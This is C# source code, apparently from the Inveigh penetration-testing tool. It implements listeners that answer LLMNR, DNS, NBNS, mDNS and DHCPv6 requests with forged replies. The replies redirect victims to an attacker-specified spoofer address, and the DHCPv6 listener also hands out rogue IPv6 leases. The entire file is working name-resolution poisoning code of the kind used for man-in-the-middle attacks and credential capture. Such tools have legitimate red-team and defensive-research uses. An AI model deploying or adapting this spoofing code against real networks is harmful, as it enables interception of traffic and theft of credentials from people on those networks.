public static void LLMNRListener(string IP, string spooferIP, string spooferIPv6, string llmnrTTL, string ipVersion)
{
byte[] spooferIPData = IPAddress.Parse(spooferIP).GetAddressBytes();
byte[] spooferIPv6Data = IPAddress.Parse(spooferIPv6).GetAddressBytes();
byte[] ttlLLMNR = BitConverter.GetBytes(Int32.Parse(llmnrTTL));
Array.Reverse(ttlLLMNR);
IPAddress llmnrListenerIP = IPAddress.Any;
if (String.Equals(ipVersion, "IPv6"))
{
llmnrListenerIP = IPAddress.IPv6Any;
}
IPEndPoint llmnrEndpoint = new IPEndPoint(llmnrListenerIP, 5355);
IPAddress destinationIPAddress = IPAddress.Parse(IP);
UdpClient llmnrClient = UDP.UDPListener("LLMNR", IP, 5355, ipVersion);
while (!Program.exitInveigh)
{
try
{
byte[] udpPayload = llmnrClient.Receive(ref llmnrEndpoint);
byte[] llmnrType = new byte[2];
System.Buffer.BlockCopy(udpPayload, (udpPayload.Length - 4), llmnrType, 0, 2);
int llmnrSourcePort = llmnrEndpoint.Port;
if (BitConverter.ToString(llmnrType) != "00-1C")
{
string llmnrResponseMessage = "";
byte[] llmnrTransactionID = new byte[2];
System.Buffer.BlockCopy(udpPayload, 0, llmnrTransactionID, 0, 2);
byte[] llmnrRequest = new byte[udpPayload.Length - 18];
byte[] llmnrRequestLength = new byte[1];
System.Buffer.BlockCopy(udpPayload, 12, llmnrRequestLength, 0, 1);
System.Buffer.BlockCopy(udpPayload, 13, llmnrRequest, 0, llmnrRequest.Length);
string llmnrRequestHost = Util.ParseNameQuery(12, udpPayload);
IPAddress sourceIPAddress = llmnrEndpoint.Address;
llmnrResponseMessage = Util.CheckRequest(llmnrRequestHost, sourceIPAddress.ToString(), IP.ToString(), "LLMNR", null, null);
if (Program.enabledLLMNR && String.Equals(llmnrResponseMessage, "response sent"))
{
byte[] llmnrResponse = LLMNR.GetLLMNRResponse("listener", ipVersion, llmnrTTL, sourceIPAddress, destinationIPAddress, spooferIPData, spooferIPv6Data, Util.IntToByteArray2(llmnrSourcePort), udpPayload);
IPEndPoint llmnrDestinationEndPoint = new IPEndPoint(sourceIPAddress, llmnrSourcePort);
UDP.UDPListenerClient(sourceIPAddress, llmnrSourcePort, llmnrClient, llmnrResponse);
llmnrClient = UDP.UDPListener("LLMNR", IP, 5355, ipVersion);
}
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] LLMNR request for {1} from {2} [{3}]", DateTime.Now.ToString("s"), llmnrRequestHost, sourceIPAddress, llmnrResponseMessage));
}
}
}
catch (Exception ex)
{
Program.outputList.Add(String.Format("[-] [{0}] LLMNR spoofer error detected - {1}", DateTime.Now.ToString("s"), ex.ToString()));
}
}
}
public static void DNSListener(string IP, string spooferIP, string dnsTTL, string dnsDomainController, string ipVersion, string[] dnsTypes)
{
byte[] spooferIPData = IPAddress.Parse(spooferIP).GetAddressBytes();
byte[] ttlDNS = BitConverter.GetBytes(Int32.Parse(dnsTTL));
Array.Reverse(ttlDNS);
IPAddress dnsListenerIP = IPAddress.Any;
if (String.Equals(ipVersion, "IPv6"))
{
dnsListenerIP = IPAddress.IPv6Any;
}
IPEndPoint dnsEndpoint = new IPEndPoint(dnsListenerIP, 53);
IPAddress destinationIPAddress = IPAddress.Parse(IP);
UdpClient dnsClient = UDP.UDPListener("DNS", IP, 53, ipVersion);
while (!Program.exitInveigh)
{
try
{
byte[] udpPayload = dnsClient.Receive(ref dnsEndpoint);
int dnsSourcePort = dnsEndpoint.Port;
string dnsRequestHost = Util.ParseNameQuery(12, udpPayload);
byte[] dnsRequest = new byte[dnsRequestHost.Length + 2];
System.Buffer.BlockCopy(udpPayload, 12, dnsRequest, 0, dnsRequest.Length);
IPAddress sourceIPAddress = dnsEndpoint.Address;
byte[] dnsRequestRecordType = new byte[2];
Buffer.BlockCopy(udpPayload, (dnsRequest.Length + 12), dnsRequestRecordType, 0, 2);
string dnsRecordType = Util.GetRecordType(dnsRequestRecordType);
string dnsResponseMessage = Util.CheckRequest(dnsRequestHost, sourceIPAddress.ToString(), IP.ToString(), "DNS", dnsRecordType, dnsTypes);
if (Program.enabledDNS && String.Equals(dnsResponseMessage, "response sent"))
{
byte[] dnsResponse = DNS.GetDNSResponse("listener", ipVersion, dnsDomainController, dnsTTL, dnsRecordType, sourceIPAddress, destinationIPAddress, spooferIPData, Util.IntToByteArray2(dnsSourcePort), udpPayload);
IPEndPoint dnsDestinationEndPoint = new IPEndPoint(sourceIPAddress, dnsSourcePort);
UDP.UDPListenerClient(sourceIPAddress, dnsSourcePort, dnsClient, dnsResponse);
dnsClient = UDP.UDPListener("DNS", IP, 53, ipVersion);
}
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] DNS({1}) request for {2} from {3} [{4}]", DateTime.Now.ToString("s"), dnsRecordType, dnsRequestHost, sourceIPAddress, dnsResponseMessage));
}
}
catch (Exception ex)
{
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[-] [{0}] DNS spoofer error detected - {1}", DateTime.Now.ToString("s"), ex.ToString()));
}
}
}
}
public static void NBNSListener(string IP, string spooferIP, string nbnsTTL, string[] nbnsTypes)
{
byte[] spooferIPData = IPAddress.Parse(spooferIP).GetAddressBytes();
byte[] ttlNBNS = BitConverter.GetBytes(Int32.Parse(nbnsTTL));
Array.Reverse(ttlNBNS);
IPEndPoint nbnsEndpoint = new IPEndPoint(IPAddress.Broadcast, 137);
UdpClient nbnsClient = UDP.UDPListener("NBNS", IPAddress.Any.ToString(), 137, "IPv4");
while (!Program.exitInveigh)
{
try
{
byte[] udpPayload = nbnsClient.Receive(ref nbnsEndpoint);
byte[] nbnsQuestionsAnswerRRs = new byte[4];
System.Buffer.BlockCopy(udpPayload, 4, nbnsQuestionsAnswerRRs, 0, 4);
byte[] nbnsAdditionalRRs = new byte[2];
System.Buffer.BlockCopy(udpPayload, 10, nbnsAdditionalRRs, 0, 2);
if (String.Equals(BitConverter.ToString(nbnsQuestionsAnswerRRs), "00-01-00-00") && !String.Equals(BitConverter.ToString(nbnsAdditionalRRs), "00-01"))
{
string nbnsResponseMessage = "";
byte[] nbnsTransactionID = new byte[2];
System.Buffer.BlockCopy(udpPayload, 0, nbnsTransactionID, 0, 2);
byte[] nbnsRequestType = new byte[2];
System.Buffer.BlockCopy(udpPayload, 43, nbnsRequestType, 0, 2);
string nbnsQueryType = NBNSQueryType(nbnsRequestType);
byte[] nbnsType = new byte[1];
System.Buffer.BlockCopy(udpPayload, 47, nbnsType, 0, 1);
byte[] nbnsRequest = new byte[udpPayload.Length - 20];
System.Buffer.BlockCopy(udpPayload, 13, nbnsRequest, 0, nbnsRequest.Length);
string nbnsRequestHost = BytesToNBNSQuery(nbnsRequest);
IPAddress sourceIPAddress = nbnsEndpoint.Address;
nbnsResponseMessage = Util.CheckRequest(nbnsRequestHost, sourceIPAddress.ToString(), IP.ToString(), "NBNS", nbnsQueryType, nbnsTypes);
if (Program.enabledNBNS && String.Equals(nbnsResponseMessage, "response sent"))
{
if (Array.Exists(nbnsTypes, element => element == nbnsQueryType) && !String.Equals(BitConverter.ToString(nbnsType), "21"))
{
byte[] nbnsResponse = NBNS.GetNBNSResponse("listener", nbnsTTL, spooferIPData, Util.IntToByteArray2(137), udpPayload);
UDP.UDPListenerClient(sourceIPAddress, 137, nbnsClient, nbnsResponse);
nbnsClient = UDP.UDPListener("NBNS", IPAddress.Any.ToString(), 137, "IPv4");
}
else if (String.Equals(BitConverter.ToString(nbnsType), "21"))
{
nbnsResponseMessage = "NBSTAT request";
}
else
{
nbnsResponseMessage = "NBNS type disabled";
}
}
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] NBNS request for {1}<{2}> from {3} [{4}]", DateTime.Now.ToString("s"), nbnsRequestHost, nbnsQueryType, sourceIPAddress, nbnsResponseMessage));
}
}
}
catch (Exception ex)
{
Program.outputList.Add(String.Format("[-] [{0}] NBNS spoofer error detected - {1}", DateTime.Now.ToString("s"), ex.ToString()));
}
}
}
public static void MDNSListener(string ipVersion, string IP, string spooferIP, string spooferIPv6, string mdnsTTL, string[] mdnsQuestions, string[] mdnsTypes)
{
byte[] spooferIPData = IPAddress.Parse(spooferIP).GetAddressBytes();
byte[] spooferIPv6Data = IPAddress.Parse(spooferIPv6).GetAddressBytes();
byte[] ttlMDNS = BitConverter.GetBytes(Int32.Parse(mdnsTTL));
Array.Reverse(ttlMDNS);
IPEndPoint mdnsEndpoint = new IPEndPoint(IPAddress.Any, 5353);
UdpClient mdnsClient = UDP.UDPListener("MDNS", IP, 5353, ipVersion);
while (!Program.exitInveigh)
{
try
{
string mdnsResponseMessage = "";
byte[] udpPayload = mdnsClient.Receive(ref mdnsEndpoint);
int mdnsSourcePort = mdnsEndpoint.Port;
byte[] mdnsType = new byte[2];
IPAddress sourceIPAddress = mdnsEndpoint.Address;
if (BitConverter.ToString(udpPayload).EndsWith("-00-01-80-01") && String.Equals(BitConverter.ToString(udpPayload).Substring(12, 23), "00-01-00-00-00-00-00-00"))
{
byte[] mdnsTransactionID = new byte[2];
string mdnsRequestHostFull = Util.ParseNameQuery(12, udpPayload);
System.Buffer.BlockCopy(udpPayload, 0, mdnsTransactionID, 0, 2);
byte[] mdnsRequest = new byte[mdnsRequestHostFull.Length + 2];
System.Buffer.BlockCopy(udpPayload, 12, mdnsRequest, 0, mdnsRequest.Length);
byte[] mdnsRequestRecordType = new byte[2];
System.Buffer.BlockCopy(udpPayload, (mdnsRequest.Length + 12), mdnsRequestRecordType, 0, 2);
string mdnsRecordType = Util.GetRecordType(mdnsRequestRecordType);
mdnsResponseMessage = Util.CheckRequest(mdnsRequestHostFull, sourceIPAddress.ToString(), IP.ToString(), "MDNS", "QU", mdnsQuestions);
if (Program.enabledMDNS && String.Equals(mdnsResponseMessage, "response sent"))
{
if (Array.Exists(mdnsTypes, element => element == "QU"))
{
byte[] mdnsResponse = MDNS.GetMDNSResponse("sniffer", ipVersion, mdnsTTL, sourceIPAddress, IPAddress.Parse(IP), spooferIPData, spooferIPv6Data, Util.IntToByteArray2(mdnsSourcePort), udpPayload);
IPEndPoint mdnsDestinationEndPoint = new IPEndPoint(sourceIPAddress, mdnsSourcePort);
UDP.UDPListenerClient(sourceIPAddress, mdnsSourcePort, mdnsClient, mdnsResponse);
mdnsClient = UDP.UDPListener("MDNS", IP, 5353, ipVersion);
}
else if (!String.Equals(mdnsRecordType, "A"))
{
mdnsResponseMessage = "record type not supported";
}
else
{
mdnsResponseMessage = "mDNS type disabled";
}
}
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] mDNS(QU) request for {1}({2}) from {3} [{4}]", DateTime.Now.ToString("s"), mdnsRequestHostFull, mdnsRecordType, sourceIPAddress, mdnsResponseMessage));
}
}
else if (BitConverter.ToString(udpPayload).EndsWith("-00-01") && (String.Equals(BitConverter.ToString(udpPayload).Substring(12, 23), "00-01-00-00-00-00-00-00") ||
String.Equals(BitConverter.ToString(udpPayload).Substring(12, 23), "00-02-00-00-00-00-00-00")))
{
byte[] mdnsTransactionID = new byte[2];
System.Buffer.BlockCopy(udpPayload, 0, mdnsTransactionID, 0, 2);
string mdnsRequestHostFull = Util.ParseNameQuery(12, udpPayload);
byte[] mdnsRequest = new byte[mdnsRequestHostFull.Length + 2];
System.Buffer.BlockCopy(udpPayload, 12, mdnsRequest, 0, mdnsRequest.Length);
byte[] mdnsRequestRecordType = new byte[2];
System.Buffer.BlockCopy(udpPayload, (mdnsRequest.Length + 12), mdnsRequestRecordType, 0, 2);
string mdnsRecordType = Util.GetRecordType(mdnsRequestRecordType);
mdnsResponseMessage = Util.CheckRequest(mdnsRequestHostFull, sourceIPAddress.ToString(), IP.ToString(), "MDNS", "QM", mdnsQuestions);
if (Program.enabledMDNS && String.Equals(mdnsResponseMessage, "response sent"))
{
if (Array.Exists(mdnsTypes, element => element == "QM"))
{
byte[] mdnsResponse = MDNS.GetMDNSResponse("sniffer", ipVersion, mdnsTTL, sourceIPAddress, IPAddress.Parse(IP), spooferIPData, spooferIPv6Data, Util.IntToByteArray2(mdnsSourcePort), udpPayload);
IPEndPoint mdnsDestinationEndPoint = new IPEndPoint(sourceIPAddress, mdnsSourcePort);
UDP.UDPListenerClient(sourceIPAddress, mdnsSourcePort, mdnsClient, mdnsResponse);
mdnsClient = UDP.UDPListener("MDNS", IP, 5353, ipVersion);
}
else if (!String.Equals(mdnsRecordType, "A"))
{
mdnsResponseMessage = "record type not supported";
}
else
{
mdnsResponseMessage = "mDNS type disabled";
}
}
lock (Program.outputList)
{
Program.outputList.Add(String.Format("[+] [{0}] mDNS(QM) request for {1}({2}) from {3} [{4}]", DateTime.Now.ToString("s"), mdnsRequestHostFull, mdnsRecordType, sourceIPAddress, mdnsResponseMessage));
}
}
}
catch (Exception ex)
{
Program.outputList.Add(String.Format("[-] [{0}] mDNS spoofer error detected - {1}", DateTime.Now.ToString("s"), ex.ToString()));
}
}
}
public static void DHCPv6Listener(string ipv6, string spooferIPv6, string snifferMAC, string dhcpv6DomainSuffix)
{
byte[] spooferIPv6Data = IPAddress.Parse(spooferIPv6).GetAddressBytes();
IPAddress destinationIPAddress = IPAddress.Parse(ipv6);
IPEndPoint dhcpv6Endpoint = new IPEndPoint(IPAddress.Parse(ipv6), 547);
//UdpClient dhcpv6Client = new UdpClient(AddressFamily.InterNetworkV6);
int dhcpv6IPIndex = 1;
byte[] dhcpv6DomainSuffixData = Util.NewDNSNameArray(dhcpv6DomainSuffix, true);
Random ipv6Random = new Random();
int ipv6RandomValue = ipv6Random.Next(1, 9999);
byte[] snifferMACArray = new byte[6];
snifferMAC = snifferMAC.Insert(2, "-").Insert(5, "-").Insert(8, "-").Insert(11, "-").Insert(14, "-");
int i = 0;
foreach (string character in snifferMAC.Split('-'))
{
snifferMACArray[i] = Convert.ToByte(Convert.ToInt16(character, 16));
i++;
}
UdpClient dhcpv6Client = UDP.UDPListener("DHCPv6", ipv6, 547, "IPv6");
while (!Program.exitInveigh)
{
try
{
byte[] udpPayload = dhcpv6Client.Receive(ref dhcpv6Endpoint);
int dhcpv6SourcePort = dhcpv6Endpoint.Port;
IPAddress sourceIPAddress = dhcpv6Endpoint.Address;
byte[] dhcpv6MessageTypeID = new byte[1];
Buffer.BlockCopy(udpPayload, 0, dhcpv6MessageTypeID, 0, 1);
byte[] dhcpv6TransactionID = new byte[3];
Buffer.BlockCopy(udpPayload, 1, dhcpv6TransactionID, 0, 3);
byte[] dhcpv6ClientIdentifier = new byte[18];
Buffer.BlockCopy(udpPayload, 10, dhcpv6ClientIdentifier, 0, 18);
byte[] dhcpv6ClientMACData = new byte[6];
Buffer.BlockCopy(udpPayload, 22, dhcpv6ClientMACData, 0, 6);
string dhcpv6ClientMAC = BitConverter.ToString(dhcpv6ClientMACData).Replace("-", ":");
byte[] dhcpv6IAID = new byte[4];
if ((int)dhcpv6MessageTypeID[0] == 1)
{
Buffer.BlockCopy(udpPayload, 32, dhcpv6IAID, 0, 4);
}
else
{
Buffer.BlockCopy(udpPayload, 46, dhcpv6IAID, 0, 4);
}
byte[] dhcpv6ClientIP = new byte[16];
string dhcpv6LeaseIP = "";
byte[] dhcpv6OptionData = new byte[2];
byte[] dhcpv6OptionLength = new byte[2];
string dhcpv6FQDN = "";
if ((int)dhcpv6MessageTypeID[0] == 1 || (int)dhcpv6MessageTypeID[0] == 3 || (int)dhcpv6MessageTypeID[0] == 5)
{
for (i = 12; i < udpPayload.Length; i++)
{
if (Util.UInt16DataLength(i, udpPayload) == 39)
{
dhcpv6FQDN = Util.ParseNameQuery((i + 4), udpPayload);
}
}
int index = BitConverter.ToString(udpPayload).Replace("-", String.Empty).IndexOf("4D53465420352E30");
if (index >= 0 && Program.dhcpv6ClientTable.ContainsKey(dhcpv6ClientMAC))
{
dhcpv6LeaseIP = Program.dhcpv6ClientTable[dhcpv6ClientMAC].ToString();
dhcpv6ClientIP = IPAddress.Parse(dhcpv6LeaseIP).GetAddressBytes();
}
else if (index >= 0 && !Program.dhcpv6ClientTable.ContainsKey(dhcpv6ClientMAC))
{
dhcpv6LeaseIP = "fe80::" + ipv6RandomValue + ":" + dhcpv6IPIndex;
dhcpv6ClientIP = IPAddress.Parse(dhcpv6LeaseIP).GetAddressBytes();
Program.dhcpv6ClientTable.Add(dhcpv6ClientMAC, dhcpv6LeaseIP);
dhcpv6IPIndex++;
lock (Program.dhcpv6FileList)
{
Program.dhcpv6FileList.Add(dhcpv6ClientMAC + "," + dhcpv6LeaseIP);
}
}
if (Program.enabledDHCPv6)
{
if (index > 0)
{
byte[] dhcpv6Response = DHCPv6.GetDHCPv6Response("listener", dhcpv6DomainSuffix, sourceIPAddress, destinationIPAddress, dhcpv6ClientIP, spooferIPv6Data, snifferMACArray, Util.IntToByteArray2(546), udpPayload);
IPEndPoint dnsDestinationEndPoint = new IPEndPoint(sourceIPAddress, 546);
UDP.UDPListenerClient(sourceIPAddress, dhcpv6SourcePort, dhcpv6Client, dhcpv6Response);
//dnsEndpoint = new IPEndPoint(dnsListenerIP, 53);
dhcpv6Client = UDP.UDPListener("DHCPv6", ipv6, 547, "IPv6");
}
}
DHCPv6Output(dhcpv6ClientMAC, dhcpv6FQDN, dhcpv6LeaseIP, sourceIPAddress.ToString(), index, (int)dhcpv6MessageTypeID[0]);
}
}
catch (Exception ex)
{
Program.outputList.Add(String.Format("[-] [{0}] DHCPv6 spoofer error detected - {1}", DateTime.Now.ToString("s"), ex.ToString()));
}
}
}